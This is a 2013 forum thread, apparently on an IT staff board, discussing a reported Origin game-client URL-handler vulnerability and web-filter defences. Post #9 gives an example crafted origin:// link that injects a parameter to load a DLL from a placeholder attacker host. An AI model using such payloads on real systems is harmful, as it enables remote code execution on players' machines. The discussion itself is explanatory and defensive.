+ Post New Thread
Results 1 to 13 of 13
General Chat Thread, Origin - Players at risk from game store hack attack in General; BBC News - Players at risk from game store hack attack I hate origin. I reluctantly caved and installed it ...
  1. #1
    Guest

    Join Date
    Jun 2009
    Posts
    3,754
    Thank Post
    1,458
    Thanked 490 Times in 375 Posts
    Rep Power
    0

    Origin - Players at risk from game store hack attack

    BBC News - Players at risk from game store hack attack

    I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.

  2. #2

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,094
    Thank Post
    592
    Thanked 1,953 Times in 1,351 Posts
    Blog Entries
    19
    Rep Power
    814
    The funny things is... Steam had this exact problem a while back. [Which was fixed pretty quickly.]

    EA didn't even bother to check if it was possible with Origin, based on their remote launch method being a copy of Steam's, and pre-patch it.

  3. #3
    Sunnyknight's Avatar
    Join Date
    Mar 2013
    Location
    Above the clouds and under the core of the earth
    Posts
    1,460
    Thank Post
    119
    Thanked 121 Times in 85 Posts
    Rep Power
    70
    Quote Originally Posted by X-13 View Post
    EA
    That label is being hated more and more everyday. Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.

  4. #4

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,094
    Thank Post
    592
    Thanked 1,953 Times in 1,351 Posts
    Blog Entries
    19
    Rep Power
    814
    Quote Originally Posted by Sunnyknight View Post
    Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.
    I heard they don't forgive. They also, allegedly, don't forget and you should expect them.

    There's also a rumour they're in it for "teh lulz".

  5. #5
    SovietRussia's Avatar
    Join Date
    Mar 2013
    Location
    Powys, Wales
    Posts
    615
    Thank Post
    69
    Thanked 132 Times in 103 Posts
    Rep Power
    44
    Great. At least I had Battlefield 3 for Free as I was a SimCity disaster case.

  6. #6
    Sunnyknight's Avatar
    Join Date
    Mar 2013
    Location
    Above the clouds and under the core of the earth
    Posts
    1,460
    Thank Post
    119
    Thanked 121 Times in 85 Posts
    Rep Power
    70
    Quote Originally Posted by X-13 View Post
    I heard they don't forgive. They also, allegedly, don't forget and you should expect them.

    There's also a rumour they're in it for "teh lulz".
    Who knows, all i know is, respect who they are or face the consequences!
    @SovietRussia

    I pulled out DS3 BF3 = too many bugs

  7. #7
    CAM
    CAM is offline

    CAM's Avatar
    Join Date
    Mar 2008
    Location
    Burgh Heath, Surrey
    Posts
    4,116
    Thank Post
    826
    Thanked 358 Times in 282 Posts
    Blog Entries
    60
    Rep Power
    281
    I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?

  8. #8

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,804
    Thank Post
    110
    Thanked 583 Times in 504 Posts
    Blog Entries
    1
    Rep Power
    224
    Yes, if something registers as a URL handler then the browser (depends) will prompt you what you want to happen the first time you click such a link. Most people don't read what they are being told and worse click the 'always do this for links like this' too. At which point the URL handler has basically the same level of access as a browser plugin.

    I don't imagine it'll be a big deal in most school environments but more generally I think you should pull up an 'average' machine and just check what url handlers you have installed (Java I'm looking at you). There's also scope for your web filter picking up 'odd' URL links. Some one like @tom_newton would know more I imagine.
    Last edited by Geoff; 19th March 2013 at 01:18 PM.

  9. #9

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,094
    Thank Post
    592
    Thanked 1,953 Times in 1,351 Posts
    Blog Entries
    19
    Rep Power
    814
    Quote Originally Posted by CAM View Post
    I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?
    Sort of.

    Code:
    origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll 
    ^ That would download a DLL from a remote location without your input. But, it could [I think] me modified to do pretty much anything. Especially, if you set it to download a lot of malicious files and a script to run them.

  10. #10


    Join Date
    Jan 2012
    Posts
    2,618
    Thank Post
    934
    Thanked 351 Times in 267 Posts
    Rep Power
    213
    There is no evidence the loophole has yet been used by malicious hackers.
    But for how long, now that it's out, 'eh?

    I think I have an origin account. Think. I had one of the BF games, can't remember which. Don't play it much anyway.
    Honestly I haven't bought anything EA in a while. Not because of any boycotts, just because I haven't xD

  11. #11
    Yeo695's Avatar
    Join Date
    Feb 2013
    Posts
    123
    Thank Post
    34
    Thanked 43 Times in 11 Posts
    Rep Power
    22
    Though i did get a free copy of Dead Space 3 for putting up with Sim City and a Free copy of BF3 from AMD card i bought a while back. EA is like drugs to me. They make a few good games that I love to play (BF3, Tomb Raider, Sim City) but buying them and supporting them is destroying my humanity. The gaming community really needs to protest this but I know it will never happen

  12. #12


    tom_newton's Avatar
    Join Date
    Sep 2006
    Location
    Leeds
    Posts
    4,475
    Thank Post
    866
    Thanked 849 Times in 671 Posts
    Rep Power
    196
    The only way to catch these in filtering is actually to look in-page (possible with your smoothie!) it's computationally cheap to "block any page containing origin://" - much more expensive to "find and replace" it out. Either is possible, but be kind to your CPU and use the "block" method

    O course by the time someone clicks the link, all bets are off, as the handler needn't obey proxy rules.

  13. #13


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    8,900
    Thank Post
    226
    Thanked 2,676 Times in 1,973 Posts
    Rep Power
    787
    Here's a new one...

    Bug in EA's Battlefield Play4Free allows attackers to hijack players' PCs « Ars Technica

    The ReVuln researchers identified the root cause of the vulnerability as the way Play4Free invokes an update mechanism. It allows attackers to use the CreateProcessW Windows API to inject a series of variables into commands that allows them to override the whitelist protection. The end result is the ability to upload a batch file to the Windows startup folder of vulnerable machines. The file is automatically executed the next time the computer is rebooted, and depending on its contents, it can install a host of malicious software.
    Obviously only any issue if you play Battlefield P4F on Windows XP. At this point, you deserve what you get if you are playing games on such an old operating system.

SHARE:
+ Post New Thread

Similar Threads

  1. Network at Risk Notification
    By AWicher in forum CLEO
    Replies: 0
    Last Post: 20th January 2011, 09:04 AM
  2. Network at Risk Notification
    By Paul_L in forum CLEO
    Replies: 0
    Last Post: 5th October 2010, 10:55 AM
  3. BSF at risk.... at least according to the LM
    By mossj in forum East Midlands Broadband Consortium (EMBC)
    Replies: 1
    Last Post: 2nd December 2009, 01:14 PM
  4. eBay: removed bid from BIN & store sales
    By contink in forum General Chat
    Replies: 0
    Last Post: 25th March 2009, 02:15 PM
  5. UK economy at risk, warns Cameron...
    By mattx in forum General Chat
    Replies: 27
    Last Post: 9th December 2008, 10:23 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •